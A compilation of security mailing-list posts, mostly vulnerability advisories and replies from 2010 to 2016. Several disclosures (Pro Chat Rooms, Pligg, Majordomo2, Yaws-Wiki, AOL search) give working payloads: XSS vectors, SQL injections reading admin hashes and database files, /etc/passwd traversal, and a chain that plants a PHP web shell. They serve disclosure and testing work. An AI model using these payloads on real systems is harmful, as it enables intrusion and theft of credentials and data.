Re: CVE-2016-5019: MyFaces Trinidad view state deserialization security vulnerability

[Mike Kienenberger]

Clarification: The first line in this CVE [1] was a copy&paste error
during message composition and is not part of the CVE.  This line can
make it sound as if CVE-2016-5019 is only an information disclosure
vulnerability rather than a deserialization attack vector.  I
apologize for the confusion.

On Thu, Sep 29, 2016 at 11:50 AM, Mike Kienenberger  wrote:
> CVE-2016-5019 Apache MyFaces Trinidad information disclosure vulnerability
>
> Severity: Important
>
> Vendor:
> The Apache Software Foundation
>
> Versions Affected:
> Trinidad from 1.0.0 to 1.0.13
> Trinidad from 1.2.1 to 1.2.14
> Trinidad from 2.0.0 to 2.0.1
> Trinidad from 2.1.0 to 2.1.1
>
> Description:
>
> Trinidad’s CoreResponseStateManager both reads and writes view state
> strings using
> ObjectInputStream/ObjectOutputStream directly.  By doing so, Trinidad
> bypasses the
> view state security features provided by the JSF implementations - ie. the 
> view
> state is not encrypted and is not MAC’ed.
>
> Trinidad’s CoreResponseStateManager will blindly deserialize untrusted
> view state
> strings, which makes Trinidad-based applications vulnerable to deserialization
> attacks.
>
> Mitigation:
>
> All users of Apache Trinidad should upgrade to either 2.1.2, 2.0.2, or
> 1.2.15 and
> enable view state encryption using org.apache.myfaces.USE_ENCRYPTION and 
> related
> web configuration parameters.
> See http://wiki.apache.org/myfaces/Secure_Your_Application for details.
>
> Upgrading all Commons Collections jars on the class path to 3.2.2/4.1
> will prevent
> certain well-known vectors of attack, but will not entirely resolve this 
> issue.
>
> References:
> https://issues.apache.org/jira/browse/TRINIDAD-2542
>
> This issue was discovered by Teemu Kääriäinen and reported by Andy Schwartz

RE: Cisco Security Advisory: Cisco Firepower Malware Block Bypass Vulnerability

[Murray, Mike]

unsubscribe

-Original Message-
From: nob...@cisco.com [mailto:nob...@cisco.com] On Behalf Of Cisco Systems
Product Security Incident Response Team
Sent: Wednesday, March 30, 2016 9:18 AM
To: bugtraq@securityfocus.com
Cc: ps...@cisco.com
Subject: Cisco Security Advisory: Cisco Firepower Malware Block Bypass
Vulnerability

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Cisco Firepower Malware Block Bypass Vulnerability

Advisory ID: cisco-sa-20160330-fp

Revision 1.0

For Public Release 2016 March 30 16:00 UTC (GMT)

+-

Summary
===

A vulnerability in the malicious file detection and blocking features of
Cisco Firepower System Software could allow an unauthenticated, remote
attacker to bypass malware detection mechanisms on an affected system.

The vulnerability is due to improper input validation of fields in HTTP
headers. An attacker could exploit this vulnerability by sending a crafted
HTTP request to an affected system. A successful exploit could allow the
attacker to bypass malicious file detection or blocking policies that are
configured for the system, which could allow malware to pass through the
system undetected.

Cisco has released software updates that address this vulnerability. There
are no workarounds that address this vulnerability.

This advisory is available at the following link: 

http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-s
a-20160330-fp
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.5 (SunOS)

iQIVAwUBVvKwFq89gD3EAJB5AQIjFg/+MHsKskM68q7HIhF7EB6yN3Pjau4/1bPd
9xYd3UJ1bh9jmrObAlwEIL+P40WUKQCO23Z/66opMboXTBSMLrAe1/2xMevx+6f5
Gkl8V1Ew0Ziona0DE3D3vtdPTmnY19KRpUwIMQbYsiKs2SaxoiX04J5Ny21+Uxvz
xskTGEW0kX7HpZ2kWODmBTyLJS1/59SJ4WNt7Sf57FOsIZRg8tk4de27yavaVqbw
eFZRYRYITnW9Ks231NhJJErM64qCis2r9yNxU5tP6BbL/CDJNbcsbqXif2t4pDCZ
YLTm3sIzfLpmz+YCWSNwcc+UBe34ssmV8zRt3O51mruY7cWKycanvrHq+S9xURix
eVoaw+PWZl5kI0RMqQhT9lKR/INXR2Ek93KNPOJXYKuEk8UJA+mVzphUVJR7tifH
+iPK7SEEPASodgE5S2lP4d5iUV6U590eUABcfSmtbCP1a80lHpjXQVmjqIa3gnEm
Byab7fxjDDGfFcnMdndWyJhEULPgIo5BCg6jMCw9SWvK7u+rSqpA/VaVc3UnvU2K
xBTSm2DKd1t09Fo6x1rk+mLOhZ+Ch+7JLCcJxNJe9J0+a4YyuHE99RgV3WmGqOb3
Kx8ojX5yF6KqT+K4pZx2LKwL8rp+r5lZu40EIz0jrFGhKKXftLOADWqMbFwZOxKR
xUMD/t+aY6s=
=sOTL
-END PGP SIGNATURE-


smime.p7s
Description: S/MIME cryptographic signature

Expedia Product Security Advisory: Cruise Ship Centers Information Disclosure

[Mike Sheward]

Expedia Product Security Advisory on 6/5/2015
Product: Expedia CruiseShipCenters (CruiseShipCenters.com)

Vulnerability Type: Insecure Direct Object Reference
Impact: Unauthorized Information Disclosure

Credit: Paul O¹Neil, IDT911 Consulting (http://idt911.com/)

Background:

During the booking finishing process with Expedia Cruise Ship Centers it
was discovered that a GET parameter (namely Œctoid') found in the
following URL, could be modified to disclose information regarding other
users of the application who had previously made
 a booking:

https://cruise.expedia.com/Book/Payment5.aspx

Once the issue was remediated, an investigation by the Expedia Incident
Response team determined that we have no reason to believe this
vulnerability was maliciously exploited.

Remedition Timeline:

Initial Discovery by Mr O'Neil: 5/27/15
Initial Response and Investigation by Expedia Incident Response: 5/27/15
Issue Confirmed Remediated: 6/3/15

Expedia Policy on Responsible Disclosures:

Expedia, Inc. and its affiliated businesses encourage users to report
vulnerabilities discovered on any of our Internet sites. If you think you
have discovered a vulnerability in the Web application code on any of our
sites, please send us an email via respd...@expedia.com
 with the following information:

* Date and time of discovery
* Specific code 
* Proof of concept exploit information

We appreciate your willingness to participate in our efforts to keep
Expedia safe and secure, and will publicly acknowledge your contributions.
The scope of this program is limited to Expedia-owned Web applications,
including Hotels.com, Hotwire.com, Expedia CruiseShipCenters, Venere.com,
Egencia.com, and VIA.com.

Thank you,

Mike Sheward
Enterprise Information Security
 Director,
 Security Operations Center and Security Incident Response
Expedia, Inc.

Re: Reflected File Download in AOL Search Website

[Mike Antcliffe]

PoC confirmed to work with Safari 8.0.3 on OSx 10.10.2

Good find!

On 16/02/2015 16:15, "Ricardo Iramar dos Santos"  wrote:

>Oren Hafif reported a new kind of attack called Reflected File
>Download 
>(https://www.blackhat.com/eu-14/briefings.html#reflected-file-download-a-n
>ew-web-attack-vector)
>in Black Hat Europe 2014 conference.
>More details about the attack you can found in his public
>presentation: 
>https://www.blackhat.com/docs/eu-14/materials/eu-14-Hafif-Reflected-File-D
>ownload-A-New-Web-Attack-Vector.pdf.
>Google and Bing have already fixed the vulnerability but I've found
>the same vulnerability in AOL Search Website.
>A malicious user could send the link below to a victim that you
>download a malicious batch file from autocomplete.search.aol.com
>domain.
>In the link below we have search for 'iramar "||calc||' using the AOL
>autocomplete domain. The browser will encode the double quotes but the
>server will escape it (\") and return inside the json on the body
>response.
>Since the response has the header "Content-Type:
>application/x-suggestions+json;charset=UTF-8" the browser will
>automatically try to download the reflected file. Chrome didn't try to
>download the file but Internet Explorer and Firefox will.
>
>http://autocomplete.search.aol.com/autocomplete/get;calc.bat?q=iramar";||ca
>lc||&it=ws-landing&dict=en_us_search&count=8&output=json
>
>REQUEST
>GET 
>http://autocomplete.search.aol.com/autocomplete/get;calc.bat?q=iramar%22||
>calc||&it=ws-landing&dict=en_us_search&count=8&output=json
>HTTP/1.1
>Host: autocomplete.search.aol.com
>User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0)
>Gecko/20100101 Firefox/33.0
>Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
>Accept-Language: en-US,en;q=0.5
>Accept-Encoding: gzip, deflate
>Cookie: ...
>Connection: keep-alive
>
>
>RESPONSE
>HTTP/1.1 200 OK
>Date: Tue, 21 Oct 2014 10:30:34 GMT
>Server: Apache-Coyote/1.1
>Content-Type: application/x-suggestions+json;charset=UTF-8
>Content-Language: en-US
>Content-Length: 24
>Keep-Alive: timeout=5, max=10
>Connection: Keep-Alive
>
>["iramar\"||calc||", []]

Pro Chat Rooms v8.2.0 - Multiple Vulnerabilities

[mike . manzotti]

# Exploit Title: Pro Chat Rooms v8.2.0 - Multiple Vulnerabilities
# Google Dork: intitle:"Powered by Pro Chat Rooms"
# Date: 5 August 2014
# Exploit Author: Mike Manzotti @ Dionach Ltd
# Vendor Homepage: http://prochatrooms.com  
# Software Link: http://prochatrooms.com/software.php 
# Version: v8.2.0
# Tested on: Debian (Apache+MySQL)

1) Stored XSS
=

Text Chat Room Software of ProoChatRooms is vulnerable to Stored XSS. After 
registered an account, an attacker can upload a profile picture containing 
Javascript code as shown below:

POST: http:///prochatrooms/profiles/index.php?id=1 
Content-Disposition: form-data; name="uploadedfile"; filename="nopic333.jpg"
Content-Type: image/jpeg

alert(document.cookie)

By inspecting the response, the web application returns a 32 digits value in 
the HTML tag "imgID" as shown below:

Response:


The picture is uploaded under the directory "/profiles/uploads" and is 
accessible by force browsing to the 32 digits value as shown below:

http:///prochatrooms/profiles/uploads/798ae9b06cd900b95ed5a60e02419d4b 

Image
 


2) Reflected XSS
=

Text Chat Room Software of ProoChatRooms is vulnerable to Reflected XSS. The 
parameter "edit" is not encoded:

http:///prochatrooms/profiles/index.php?id=1&edit=">alert(document.cookie)
 
 


3) SQL Injection


Text Chat Room Software of ProoChatRooms is vulnerable to SQL injections. 
Across the all source code of web application, parameterized queries are used 
to query the database. However, a lack of data sanitization of three parameters 
leaves the web application vulnerable to SQLi. The vulnerable parameters are 
located as shown below:

prochatrooms_v8.2.0/includes/functions.php: ~2437
$params = array(
'password' => md5($password),
'email' => makeSafe($email),
'id' => $id
);
$query = "UPDATE prochatrooms_users 
  SET email = '".$email."', 
password='".md5($password)."' 
  WHERE id = '".$id."'
  ";

prochatrooms_v8.2.0/includes/functions.php: ~2449
$query = "UPDATE prochatrooms_users 
  SET email = '".$email."'
  WHERE id = '".$id."'
  ";

prochatrooms_v8.2.0/includes/functions.php: ~3110
$query = "UPDATE prochatrooms_users 
  SET active = '".$offlineTime."', online = '0' 
  WHERE username = '".makeSafe($toname)."'
  ";

Note that the “makeSafe” function is defined as shown below and will protect 
against XSS attacks only:

prochatrooms_v8.2.0/includes/functions.php: ~125
function makeSafe($data)
{
  $data = htmlspecialchars($data);

  return $data;
}


After registering an account, an attacker can exploit the SQL injection by 
editing the field email as shown below which will retrieve the MD5 hashed 
password of the administrator:

POST  http:///prochatrooms/profiles/index.php?id=1 
Content-Disposition: form-data; name="profileEmail"

m...@1dn.eu', email=(select adminLogin from prochatrooms_config) where id ='1';#
 

The following SQL injection will retrieve the SQL connection string, which 
probably has clear-text database credentials.

POST http:///prochatrooms/profiles/index.php?id=1 
Content-Disposition: form-data; name="profileEmail"

m...@1dn.eu', email=(select load_file('/var/www/prochatrooms/includes/db.php')) 
where id ='1';#
 



4) Arbitrary File Upload 
=

It is possible to combine the Stored XSS and SQL injection vulnerabilities to 
upload a web shell on the server. 

The following request will upload a PHP web shell and the web application will 
return a 32 digit value.

POST:  http:///prochatrooms/profiles/index.php?id=1 
Content-Disposition: form-data; name="uploadedfile"; filename="m.jpg"
Content-Type: application/octet-stream



Response:


Since the uploaded web shell is without extension it will not be executed:

http:///prochatrooms/profiles/uploads/82d0635538da4eac42da25f8f95f8c45


Image:
 

However, exploiting the SQL injection it is possible to rename the file by 
appending a .php extension

POST  http:///prochatrooms/profiles/index.php?id=1 
Content-Disposition: form-data; name="profileEmail"

m...@1dn.eu' where id ='1'; SELECT 
load_file('/var/www/prochatrooms/profiles/uploads/82d0635538da4eac42da25f8f95f8c45')
 INTO OUTFILE '/var/www/prochatrooms/profiles/uploads/s.php';#

Web shell:
http:///prochatrooms/profiles/uploads/s.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Image:
 


Timeline

19/07/2014: Vendor informed via email
04/08/2014: Vendor informed via email
05/08/2014: Public Disclosure

Kind regards,
Mike

[CVE- Requested][Vembu Storegrid - Multiple Critical Vulnerabilities]

[Mike Antcliffe]

1. Advisory Overview


Multiple vulnerabilities exist in the Vembu Storegrid Backup and Disaster
Recovery solution affecting both the client and server software (see
Additional Information section) include but are not limited to reflected
XSS, source code/sensitive
 information disclosure, privilege escalation, remote code execution,
Denial of Service, and poorly implemented business logic in the client
which can be leveraged to allow an unauthenticated user to exfiltrate full
disk backups from a target machine via a
 rogue server. This is a white-label product and may be labelled as
something else.


2. Advisory information

- - Public Release Date: 4/8/2014

- - Vendor notified: Yes 30/7/2014

- - CVE¹s: requested 1/8/2014

- - Last Revised: 4/7/2014

- - Researchers: Mike Antcliffe and Ed Tredgett

- - Research Organisation: Logically Secure Ltd

- - Research Organisation Website: http://www.logicallysecure.com


3. Vulnerability Information

- - Vendor: Vembu

- - Affected Software:
- Storegrid Backup and Disaster recovery solutions SP edition
  (Affects version 4.4.X and version 6.x Client and SP Server on
multiple platforms)

- - Product Website: https://www.vembu.com/products/bdr/

- - Vulnerability Class: Multiple

- - Remotely Exploitable: Yes

- - Locally Exploitable: Yes

- - Authentication Required: No

- - Indicator of network presence: Ports 6060 and 6061 accept HTTP/S
connections.


4. Vendor Solution

None, however Issues may be addressed in version 6.2 (vendor reviewing the
feasibility of a patch)



5. Additional Information.

The main vulnerability takes advantage of the client enrolment procedure.
In it¹s default state it is possible for an unauthenticated attacker to
register a client to a rogue backup server. During this enrolment phase a
new admin user is automatically
 created on the client using the attacker specified credentials, the
attacker can then bounce through their rogue server using the
cln= get parameter which invokes request forwarding
functionality allowing access the remote client interface. From
 here they can schedule their own backups to their server and specify
their own encryption keys. These backups can then be restored to an
attacker controlled virtual machine allowing the attacker full access to
whatever has been taken. It is also possible to
 backup a directory containing a toolbox of malicious scripts and
executables from the attacker controlled virtual machine and restore these
to a target machine. We found an option in the client web interface which
allows a user to disable the ability to enrol
 new servers but were able to bypass this using common attack vectors.

The backup functionality also allows the user to execute commands as part
of the backup process by default these run with system level privs. We
have successfully gained system level remote shells using this method.
>From there we were able to manipulate
 the web console to hide all traces of our exploits from the regular user,
kill AV, drop the firewall, access the registry, dump password hashes and
finally screw up the machine (by deleting arbitrary system files) so it
wouldn¹t boot and needed restoring (thus
 removing traces of our activity).

The whole process could easily be automated to target an entire subnet.

In addition to the above mentioned issue we discovered reflected XSS
vulnerabilities, Source code disclosure via incorrect processing of
trailing slash (eg http://clientip/index.php/), Denial of Service via
unhandled
 exceptions in the client, Local privilege escalation, insecure storage of
credentials (MD5), poor mysql implementation (default root user configured
with a simple password), and several others.

Note: We first discovered the vulnerabilities whilst testing a corporate
network with around 60 active installs of the client software ranging from
domain controllers to HR machines, and client laptops containing personal
data. We were able to siphon off
 any data we liked. The client supports our decision to go public now they
have removed the software.

We will be providing a full writeup as well as examples on our website
shortly.

Note2: This software is white-label and is commonly distributed under many
names.

Note3: According to the vendor they have a network of over 3000+ partners
holding over 25PB of critical data.


Mike Antcliffe

Logically Secure

@mantcliffe @EdTredgett @LogicallySecure

Re: [Full-disclosure] Apache suEXEC privilege elevation / information disclosure

[Mike Ely]

Seems to me we have two positions that aren't that far apart but due to various 
reasons the conversation has devolved into something less worthy of a public 
discussion than most of what I see on Bugtraq.  FWIW I'm in the camp of "ship 
the software with secure defaults" but at the same time I agree that Reindl 
makes a valid point when he asks what exactly one means by "secure" (even if I 
don't agree with his reasoning in this case).

That said, the conversation has really taken an ugly turn, and I am humbly and 
only speaking for myself requesting that all concerned take some time to cool 
off, go for a walk (down to the pub if that helps), and come back with a focus 
more on the technical question at hand rather than the emotional response that 
has been rising to the top.

Thanks,
Mike

Stored and Reflective XSS in Yaws-Wiki 1.88-1 (Erlang)

[mike]

Software: yaws-wiki

version affected: 1.88-1 

platform:  Erlang

homepage:http://yaws.hyber.org/

Researcher: Michael Brooks

Original Advisory:https://sitewat.ch/en/Advisory/4



Install instructions for Ubuntu:

sudo apt-get install yaws-wiki



Edit:/etc/yaws/conf.d/yaws-wiki.conf

#add this:



 port = 8181

 listen = 0.0.0.0

 docroot = /var/lib/yaws-wiki





Then restart yaws:

sudo /etc/init.d/yaws restart





Reflective XSS:

http://localhost:8181/editTag.yaws?node=ALockedPage&tag=%3E%3C/pre%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E

http://localhost:8181/showOldPage.yaws?node=home&index=%3E%3C/pre%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E

http://localhost:8181/allRefsToMe.yaws?node=%3E%3C/pre%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E



Stored XSS:

http://localhost:8181/editPage.yaws?node=home



The large textbox on the editPage.yaws page is vulnerable to xss.  This is 
the"text" post variable:

alert(1) 

Re: Re: HTB22905: Path disclosure in Wordpress

[mike]

I agree,  this is a configuration issue not an issue with Wordpress.   
Wordpress SHOULD NOT fix this "issue" because it will make it more difficult to 
write wordpress modules. 

All production systems should have this configuration:
display_errors=off

Re: Vulnerabilities in some SCADA server softwares

[Mike Hoskins]

On 3/23/11 9:46 AM, J. Oquendo wrote:

How about we reflect reality?


We can't honestly do that, we all only have our perception.  It's funny 
how we can get stuck in a trap of 0 and 1.


My perception is we'll always disagree on disclosure technique, or at 
least nitpick some minor detail into infinity like we do with politics 
or religion.  We're human after all.


That said, bugs exist whether we find them or not, every software has 
them, and if the author had never reported them that in no way implies 
they were not already known and/or being used for subversive means with 
the potential intent to cause harm.


I guess I'm oldsk00l enough to like responsible disclosure, but also 
anti-authoritarian enough (who's making the rules?  why are they god?) 
to believe this is not black and white.  Scare away those who disclose 
(regardless of method), and you're left with undisclosed vulnerabilities 
the bad guys with the most to gain ($$$ to invest in teams of 
hacke^H^H^Hengineers, not just script kiddies) still know about and can 
most effectively leverage.


I say the only bad disclosure is no disclosure.  If vendors can't move 
fast enough, they'll be usurped by those who can make better use of new 
processes and technologies to keep up with trends.


PS: Is this really "hot" now?  My only thought when I read the original 
post was "about time" -- SCADA has been known (as in publicly aired on 
broadcast television) to have many gaping vulnerabilities for at least a 
decade.  The (obviously bogus) justification was usually it's restricted 
deployment model.

Re: Prestashop Cartium 1.3.3 Multiple Cross Site Scripting (XSS)

[mike]

This is fake for usre.  I have tested prestashop before and I posted real xss 
that affected prestashop to bugtraq and it was filtered.  Why wasn't this 
filtered

Majordomo2 - Directory Traversal (SMTP/HTTP)

[mike]

Original Advisory: https://sitewat.ch/en/Advisory/View/1

Credit: Michael Brooks (https://sitewat.ch)

Vulnerability:  Directory Traversal

Software: Majordomo2

Identifier:CVE-2011-0049

Vendor: http://www.mj2.org/

Affected Build: 20110121 and prior

 

Special thanks to Dave Miller,  Reed Loden and the rest of the Mozilla security 
team for handling the issue.

 

This vulnerability is exploitable via ALL of Majordomo2's interfaces. 
*Including e-mail*.  Send an email to majordomo's mail interface (for example: 
majord...@bugzilla.org) with the body of the message as follows:

help ../../../../../../../../../../../../../etc/passwd

 

I'll give you one guess as to the contents of the response email ;).

 

PoC for HTTP:

http://localhost/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd

Pligg XSS and SQL Injection

[mike]

Credit: Michael Brooks
Bug Fix in 1.1.2:
http://www.pligg.com/blog/1174/pligg-cms-1-1-2-release/

Special thanks to Eric Heikkinen for patching these quickly.

Blind SQL Injection
http://host/pligg_1.1.2/search.php?adv=1&status=
'and+sleep(9)or+sleep(9)or+1%3D' &search=on&advancesearch= Search
+&sgroup=on&stags=0&slink=on&scategory=on&scomments=0&suser=0

XSS:
http://host/pligg_1.1.2/?xss='onmouseover=alert(1);//
http://host/pligg_1.1.2/?search="; onclick=alert(1) a=


The "onclick" event can be used as reflective xss on /register.php using the 
following post variables:
reg_username
reg_email
reg_password
reg_password2

Re: Security-Assessment.com Advisory: Oracle JRE - java.net.URLConnection class - Same-of-Origin (SOP) Policy Bypass

[Mike Duncan]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

On 10/20/2010 10:11 PM, Roberto Suggi Liverani wrote:

>  
> In Java SE 6 update 10, both the Java Web Start and Java Plug-In
> technologies contain preliminary support for cross-domain policy
> files, which specify how unsigned code may access web services on the
> Internet. The crossdomain.xml policy file is hosted on a given server
> and allows either selected clients, or clients from anywhere, to
> connect to that server. Cross-domain policy files make accessing web
> services much easier, particularly from unsigned applets.

Great...something else to worry about which uses crossdomain.xml.  :/

I admit, I did not know about this functionality being added. I
apologize for not doing some homework ahead of time.

Personally, I think it is a step in the wrong direction by Java
developers. Research shows the only reason this functionality was added
was to keep Java in the same market space as other technologies which
already use crossdomain.xml functionality (e.g. Silverlight and Flash).

Back to the matter at hand...that same page also states...

"Access to a particular server is only granted if the crossdomain.xml
file is present and contains only an entry granting access from all
domains."

Wouldn't this mean that functionality was documented and functioning as
documented? I am not saying there is no issue here, but it seems like
you "discovered" something which was documented.



>  
> Again, the Java Applet is *unsigned* and there is *no* crossdomain.xml
> policy
> which set rules of access control between www.targetsite.net and
> www.badsite.com

But, my point is that the current functionality is documented to ignore
the "set rules" you mention. In fact, there really are no rules for the
client to go by -- either the file is present and you can connect
(domain="*") or a signature is needed. The JVM does not read the domain
attribute to know whether or not to abide by SOP policies.


>  
>  
> You need to rename MaliciousJavaApplet.java to MaliciousJavaApplet2.java
> and then
> compile it or change MaliciousJavaApplet2 to MaliciousJavaApplet in the
> source code.
> That was against script-kiddies...

Come on now. Renaming the file is not a script kiddie protection measure
when the domains to talk to are hard coded. I did not mean this to
be a cut-down or something against your programming skills, but a note
to others who may test out this vulnerability as well using your code
provided.

>  
> Then:
>  
> javac MaliciousJavaApplet2.java or javac MaliciousJavaApplet.java
> (depending which change you made)
>  
> No compilation issues for me.

Once renamed, as you stated above, I did not have any issues running the
code either.

>  
>  
> [...]
> We appreciate the responsible disclosure, but I am looking at the
> advisories for Oct 2010 from Oracle (see
> http://www.oracle.com/technetwork/topics/security/cpuoct2010-175626.html
> ) and
> I do not see this "fix" listed anywhere. I see Java VM stuff but only in
> the context of being fixed as part of another, parent component like
> Database Server.
>  
> Am I looking in the wrong place?
> [...].
>  
> Yes. Have a look here:
>  
> http://www.oracle.com/technetwork/topics/security/javacpuoct2010-176258.html
> 
>  
> FYI - bug has an internal Oracle/Sun ID 6980004 - and a CVE-2010-3573 as
> well.

You have to admit here, the documents online barely touch on the actual
issues with the code. For instance,
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3573 basically
just states that there exist issues "via unknown vectors". Some smaller
amounts of additional info can be gathered from here too:
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3573.

Hell, I actually found a lot of misinformation about this CVE as well
while searching for it. Some places stated it was an issue in how the
JVM parses request headers which is clearly not your issue here. Perhaps
your issue was bundled with other -- who knows. I would seriously have
no idea what the CVE is supposed to address if you had not posted this
message.

I am hopeful that this discussion will change the crossdomain
functionality present in the JVM. I applaud you for disclosing this
issue, but I think this was a documented feature -- even if it was
.5-ass'ed put together by the Java devs.



Thanks Roberto.

Mike Duncan
Dep. ISSO, Application Security Specialist
National Climatic Data Center, NOAA

-BEGIN PGP SIGNATURE-
Version: GnuPG v2.0.15 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAkzAnu4ACgkQnvIkv6fg9hbg2wCfTZB880GyBfdUVH4VxY1Ohp95
hzwAnRFOciZ/4vL507DQCSSo2K9Z9RBv
=nniH
-END PGP SIGNATURE-

Re: Security-Assessment.com Advisory: Oracle JRE - java.net.URLConnection class - Same-of-Origin (SOP) Policy Bypass

[Mike Duncan]

more information on the new release of JRE/JDK 
> please refer to the link:
> 
> http://www.oracle.com/technetwork/java/javase/downloads/index.html
> 
> +--+
> |Credit|
> +--+
> 
> Discovered and advised to Oracle
> August 2010 by Roberto Suggi Liverani of 
> Security-Assessment.com.
> 
> Personal site: http://malerisch.net
> 

My guess is that you are trusting these applets to execute in some
manner which you are not aware of -- perhaps, you simply accepted the
certificate once before choosing "Accept Always..." or something and
this is messing with your results.

It seems to me that a huge issue like this would have made more noise
too. URLConnection is not exactly an unused class in Java. It is
everywhere and used in a lot of applications.

Good luck.

Mike Duncan
Dep. ISSO, Application Security Specialist
National Climatic Data Center, NOAA
-BEGIN PGP SIGNATURE-
Version: GnuPG v2.0.15 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAky/BSYACgkQnvIkv6fg9hYakgCfYnPD4UBncy071TBAsV0re952
yAAAoJIKFM4IpHouzW5p4VpaVoEatp2c
=Is68
-END PGP SIGNATURE-

Re: 2Wire Broadband Router Session Hijacking Vulnerability

[Mike Duncan]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


Good to hear, but hard to see how this will really fix anything. Unlike
most modern application and devices, these routers do not update
firmware automatically or allow for the user to update them in any real
world scenario. Hell, most ISPs who use these are probably not even on
this list or pay attention to advisories primarily because they
lease/rent the modems/routers out to customers -- placing the
responsibility of updating on the user. Who -- in most cases -- even
touches the router/modem without support could be violating the ToS.

This should show the firmware/router manufactures the need for more real
world testing before deployment as well as allowing for patching via the
ISP or at least allow the user to update the firmware easily.

Thanks for all the hard work, YGN Ethical Hacker Group. Good job and
keep it up.

Mike Duncan
ISSO, Application Security Specialist
Government Contractor with STG, Inc.
NOAA :: National Climatic Data Center

On 08/21/2010 12:30 PM, YGN Ethical Hacker Group wrote:
> 2wire support just replied that this has been fixed and new version
> (6.x.x.x) has been released.
> 
> The advisory has been updated accordingly.
> 
> http://yehg.net/lab/pr0js/advisories/2wire/[2wire]_session_hijacking_vulnerability
-BEGIN PGP SIGNATURE-
Version: GnuPG v2.0.15 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAkxyyMYACgkQnvIkv6fg9hZ7QACffimUvg/qbTOO3h2Hkh4VvXFd
2fwAnRSWFwbJm4JNzfgI5CjjBTEG7Pat
=j+61
-END PGP SIGNATURE-

phpvidz Administrative Password Disclosure

[mike]

Original 
Advisory:http://blog.sitewat.ch/2010/05/phpvidz-administrative-password.html

Affecting: phpvidz 0.9.5
Vulnerability: Administrative Password Disclosure 
Vendor's Homepage: http://sourceforge.net/projects/phpvidz/
Date: May 15th 2010
Researcher: Michael Brooks


phpvidz does not use a SQL database.  Instead it uses a system of flat files to 
maintain application state.  The administrative password is stored within the 
following file and is included during runtime.  Because this file has a .inc 
extension it is viewable by the attacker. 

To exploit this issue visit this url:
http://localhost/phpvidz_0.9.5/includes/init.inc
By default the password is the following constant:
define ('ADMINPASSWORD', '');
This password can be used to login here (A username is not required):
http://localhost/phpvidz_0.9.5/admin.php

Re: Firefox 3.6 for Windows includes a forged CA cert

[Mike Duncan]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Good question. Confirmed on Linux version as well (Mozilla/5.0 (X11; U;
Linux i686; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6). More
information about the rogue-CA can be found here:
http://www.phreedom.org/research/rogue-ca/.

# openssl x509 -in MD5CollisionsInc.pem -noout -text
Certificate:
Data:
Version: 3 (0x2)
Serial Number: 66 (0x42)
Signature Algorithm: md5WithRSAEncryption
Issuer: C=US, O=Equifax Secure Inc., CN=Equifax Secure Global
eBusiness CA-1
Validity
Not Before: Jul 31 00:00:01 2004 GMT
Not After : Sep  2 00:00:01 2004 GMT
Subject: CN=MD5 Collisions Inc. (http://www.phreedom.org/md5)
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public Key: (1024 bit)
Modulus (1024 bit):
00:ba:a6:59:c9:2c:28:d6:2a:b0:f8:ed:9f:46:a4:
a4:37:ee:0e:19:68:59:d1:b3:03:99:51:d6:16:9a:
5e:37:6b:15:e0:0e:4b:f5:84:64:f8:a3:db:41:6f:
35:d5:9b:15:1f:db:c4:38:52:70:81:97:5e:8f:a0:
b5:f7:7e:39:f0:32:ac:1e:ad:44:d2:b3:fa:48:c3:
ce:91:9b:ec:f4:9c:7c:e1:5a:f5:c8:37:6b:9a:83:
de:e7:ca:20:97:31:42:73:15:91:68:f4:88:af:f9:
28:28:c5:e9:0f:73:b0:17:4b:13:4c:99:75:d0:44:
e6:7e:08:6c:1a:f2:4f:1b:41
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage:
Digital Signature, Non Repudiation, Certificate Sign,
CRL Sign
X509v3 Basic Constraints: critical
CA:TRUE
X509v3 Subject Key Identifier:
A7:04:60:1F:AB:72:43:08:C5:7F:08:90:55:56:1C:D6:CE:E6:38:EB
X509v3 Authority Key Identifier:

keyid:BE:A8:A0:74:72:50:6B:44:B7:C9:23:D8:FB:A8:FF:B3:57:6B:68:6C

Netscape Comment:
3
Signature Algorithm: md5WithRSAEncryption
a7:21:02:8d:d1:0e:a2:80:77:25:fd:43:60:15:8f:ec:ef:90:
47:d4:84:42:15:26:11:1c:cd:c2:3c:10:29:a9:b6:df:ab:57:
75:91:da:e5:2b:b3:90:45:1c:30:63:56:3f:8a:d9:50:fa:ed:
58:6c:c0:65:ac:66:57:de:1c:c6:76:3b:f5:00:0e:8e:45:ce:
7f:4c:90:ec:2b:c6:cd:b3:b4:8f:62:d0:fe:b7:c5:26:72:44:
ed:f6:98:5b:ae:cb:d1:95:f5:da:08:be:68:46:b1:75:c8:ec:
1d:8f:1e:7a:94:f1:aa:53:78:a2:45:ae:54:ea:d1:9e:74:c8:
76:67



Mike Duncan
ISSO, Application Security Specialist
Government Contractor with STG, Inc.
NOAA :: National Climatic Data Center


On 03/19/2010 04:22 PM, Francis Litterio wrote:
> In Firefox 3.6 for Windows, go to Tools -> Options -> Advanced -> Encryption 
> ->
> View Certificates -> Authorities and scroll down to the entry for "Equifax
> Secure Inc." and you'll see a cert labeled "MD5 Collisions Inc
> (http://www.phreedom.org/md5)" grouped with the other Equifax certs.
> 
> Yes, it's expired, so it poses no real threat, but why is the Mozilla Project
> shipping Firefox with that cert?  It just causes FUD.
